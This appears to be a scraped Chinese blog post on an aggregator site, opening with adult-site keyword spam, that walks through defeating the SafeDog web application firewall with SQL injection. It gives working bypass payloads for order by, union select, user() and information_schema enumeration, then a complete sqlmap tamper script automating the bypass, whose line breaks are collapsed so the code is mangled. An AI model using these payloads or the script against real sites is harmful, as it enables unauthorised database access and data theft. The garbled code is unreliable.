日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

【网络安全】SQL注入bypass最新版安全狗

發布時間:2025/3/21 数据库 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【网络安全】SQL注入bypass最新版安全狗 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

前言

安全狗又偷偷摸摸更新了

【網絡安全學習】

繞過

之前安全狗就像沒開發完一樣,簡單內聯就過去了,但是現在的安全狗搖身一變,變得穩重了起來。

就連報錯界面都變成了大人的模樣。

看這架勢,不好過啊

首先 and 內斂注釋依舊是可以過的,看來安全狗并沒有太過關注and,可能是覺得后面的規則比較牛,知道有注入也沒用?

然后是order by ,從這里開始,事情就變得微妙了起來

猜測規則是order by 組合強規則,意思就是order by中間無論加什么都過不去

隨便試一試

果然,但是有沒有發現,我fuzz的符號里沒有加#號,因為加了就會這樣

由于錨點這個特殊性,盲猜這是一個突破點

可能安全狗遇到注釋也會直接截斷掉后面的語句(類似某鎖),那就好說了,構造個注釋在語句前面即可

居然沒過,小看你了安全狗,看來order by規則還沒失效,那么 嘗試隔斷order by

中間加個%0a

輕輕松松

接下來是union select 組合

同理,也可以這樣過

1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,2,3 --+


下一個是user()這類函數,這里也是個坑,發現直接括號會被攔

去一個右括號就沒事了,這規則也是無語

既然如此,在括號里下文章即可

依然是換行加注釋繞過

-1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,user(%0a /*!80000aaa*/),3 -- +


然后是INFORMATION_SCHEMA 這玩意,居然也被加到了規則里,

沒關系,繼續構造換行注釋,

-1' REGEXP "[…%0a%23]" /*!11444union %0a select*/ 1,(select %0a group_concat(schema_name %0a /*80000aaa*/) %0a from %0a /*!11444 /*REGEXP "[…%0a%23]"*/ %0a information_schema.schemata*/),3-- +

tamper

#!/usr/bin/env python # -*- coding: utf-8 -*-""" Copyright (c) 2006-2019 sqlmap developers (http:%23 %26%23 %26sqlmap.org%23 %26) See the file 'LICENSE' for copying permission Author:pureqh.top """import re import osfrom lib.core.data import kb from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS __priority__ = PRIORITY.LOWdef dependencies():singleTimeWarnMessage("Bypass safedog by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))def tamper(payload, **kwargs):payload=payload.replace(" "," ",1)payload=payload.replace("ORDER BY","REGEXP "[...%25%23]" /*!11444order %0a by*/")payload=payload.replace("union ALL SELECT","/*!11444union all%0a select*/")payload=payload.replace(" AND","/*!11444AND*/")payload=payload.replace("(SELECT (CASE","(/*!11444SELECT*/ %0a (CASE")payload=payload.replace("UNION SELECT","/*!11444union*/ /*REGEXP "[...%25%23]"*/ %0a select /*REGEXP "[...%25%23]"*/")payload=payload.replace("UNION ALL SELECT","REGEXP "[...%0a%23]" /*!11444union %0a select */ ")payload=payload.replace("()","(%0a /*!80000aaa*/)")payload=payload.replace(" AS","/*!11444AS*/")payload=payload.replace("FROM","/*!11444FROM*/")payload=payload.replace("INFORMATION_SCHEMA","/*like"%0a%23"*/ %0a INFORMATION_SCHEMA")payload=payload.replace("INFORMATION_SCHEMA.TABLES","%0a /*!11444INFORMATION_SCHEMA.TABLES*/")return payload

題外話 某鎖也能這樣過

點擊【網絡安全學習資料·攻略】查看

總結

以上是生活随笔為你收集整理的【网络安全】SQL注入bypass最新版安全狗的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。